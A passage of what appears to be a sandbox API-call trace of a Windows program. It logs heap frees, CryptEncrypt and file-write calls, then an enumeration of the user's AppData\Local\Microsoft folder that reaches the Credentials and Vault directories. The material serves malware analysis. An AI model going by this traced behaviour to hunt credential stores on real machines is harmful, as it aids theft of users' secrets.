lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0168.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0168.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.912] CryptEncrypt (in: hKey=0x9e1fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0168.912] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0168.912] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.912] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.912] CryptEncrypt (in: hKey=0x9e1fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x8) returned 1 [0168.912] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.912] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.912] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.912] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.912] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.913] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.913] WriteFile (in: hFile=0x4e0, lpBuffer=0x2a72708*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72708*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0168.914] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa948, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0168.914] CryptDestroyKey (hKey=0x9e1fb8) returned 1 [0168.914] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.915] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.915] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.915] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.915] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0168.921] CryptReleaseContext (hProv=0x9bec48, dwFlags=0x0) returned 1 [0168.921] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.921] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.922] FreeLibrary (hLibModule=0x76390000) returned 1 [0168.922] CloseHandle (hObject=0x4e0) returned 1 [0168.923] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.923] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.923] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Microsoft", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpFilePart=0x8cedf4*="Microsoft") returned 0x27 [0168.923] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft")) returned 0x10 [0168.923] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1fb8 [0168.923] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff5a990, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CLR_v2.0", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4005dd03, ftCreationTime.dwHighDateTime=0x1d3272c, ftLastAccessTime.dwLowDateTime=0x97043032, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x97043032, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CLR_v4.0", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dfe9793, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x8dfe9793, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x8e0ce49a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CLR_v4.0_32", cAlternateFileName="CLR_V4~1.0_3")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xffd2dee9, ftLastAccessTime.dwHighDateTime=0x1d5d805, ftLastWriteTime.dwLowDateTime=0xffd2dee9, ftLastWriteTime.dwHighDateTime=0x1d5d805, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9153cde, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc9153cde, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc9153cde, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc5e206cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Feeds", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4373c58d, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc5e21595, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4373c58d, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8280f106, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x8280f106, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x8280f106, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="FORMS", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc71f3a6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc5e719bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdeb2fb6c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="GameDVR", cAlternateFileName="")) returned 1 [0168.924] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xabf27288, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xabf27288, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee04858, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc5ea402c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdee04858, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="InstallAgent", cAlternateFileName="INSTAL~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cfd5892, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9b374a10, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x9b374a10, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xabb473f3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3c685c43, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x3c685c43, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0db3a8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa3009cf0, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xa3009cf0, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Office", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd358a482, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x91e02a2a, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x91e02a2a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x827c2c6b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xdc6aa62a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdc6aa62a, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Outlook", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdd63cb27, ftCreationTime.dwHighDateTime=0x1d327b2, ftLastAccessTime.dwLowDateTime=0xdd63cb27, ftLastAccessTime.dwHighDateTime=0x1d327b2, ftLastWriteTime.dwLowDateTime=0xdd63cb27, ftLastWriteTime.dwHighDateTime=0x1d327b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="PenWorkspace", cAlternateFileName="PENWOR~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc7d69cc9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="PlayReady", cAlternateFileName="PLAYRE~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43ffd581, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x43ffd581, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x43ffd581, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeaeec2c4, ftCreationTime.dwHighDateTime=0x1d327d4, ftLastAccessTime.dwLowDateTime=0xeaeec2c4, ftLastAccessTime.dwHighDateTime=0x1d327d4, ftLastWriteTime.dwLowDateTime=0xeaeec2c4, ftLastWriteTime.dwHighDateTime=0x1d327d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="TaskSchedulerConfig", cAlternateFileName="TASKSC~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc7e3414f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbfcc934a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Vault", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, 